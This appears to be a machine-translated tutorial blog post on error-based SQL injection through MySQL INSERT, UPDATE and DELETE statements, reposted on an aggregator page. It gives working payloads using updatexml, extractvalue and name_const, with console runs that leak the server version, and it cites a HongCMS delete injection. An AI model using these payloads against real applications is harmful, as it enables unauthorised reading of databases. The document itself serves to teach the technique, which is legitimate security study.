insert, update and delete injection method

Others 2019-06-17 19:23:36 views: null
Disclaimer: This article is a blogger original article, shall not be reproduced without the bloggers allowed. https://blog.csdn.net/qq1124794084/article/details/84590929

The most common injection is more select queries injection, but a malicious SQL injection will put the data into the database when the parameter is not checked and filtered, resulting in SQL injection.

All said that in addition to the inquiry, all requests and interacting with the database are likely to cause injection. Such as: insert data, changing data, deleting data, so now summary of what injection method insert, update and delete according to skill online.

The following are the error injection test database version 5.7.21

Using the built-in functions updatexml, extractvalue or name_const

Test table is as follows:

First, the use The updatexml () function


UPDATEXML (XML_document, XPath_string, new_value)  ;
The first argument: XML_document is String format, the name of the XML document object, the text for Doc 
second argument: XPath_string (Xpath string format), if not understand Xpath syntax, Find a tutorial online. 
The third argument: new_value, String format, replace the found qualified data 
functions: changing the value of the document in line with the conditions of the node
to change the value of XML_document in line with XPATH_string
and our injection statement:
updatexml (1, concat (0x7E , (SELECT @@ version), 0x7e ), 1)
wherein the concat () function which is connected into a string, it will not conform XPATH_string formats that appear malformed burst
eRROR 1105 (HY000): XPATH syntax error: ': root @ localhost '

payload:

or updatexml(1,concat(0x7e,(version())),0) or

 

Test insert injection:

mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Update the injection test

mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test delete injection

mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Two, extractvalue () function

extractvalue (): function to query an XML document
is actually equivalent to the familiar HTML file using the <div> <p> <a> label to find the same elements of
syntax: extractvalue (target xml documents, xml path)
The second argument xml operative position in the place, xml document to locate the character position is / xxx / xxx / xxx / ... this format, if we write a different format, it will error, and we will return illegally written format content, and this content is illegal content we want to query.
The second parameter query normal position format / xxx / xx / xx / xx , even if no error will not find the

payload:

or extractvalue(1,concat(0x7e,database())) or

Test insert injection

mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Injection test update:

mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test delete injection

mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Three, name_const () function

name_const (name, value)
returns the given value. When used to produce a set of columns results, name_const () cause the column of the given name.

payload

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

Test insert injection

mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'

Update the injection test

mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

Test delete injection

mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

Reference Links: https://www.cnblogs.com/r00tgrok/p/3854754.html

Real test:

HongCMS sql injection in the background there is time to clear the table, that is, delete injection

Detail connection: https://www.freebuf.com/vuls/178316.html

Use updatexml payload

Use extractvalue

Use name_const

Guess you like

Origin blog.csdn.net/qq1124794084/article/details/84590929
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com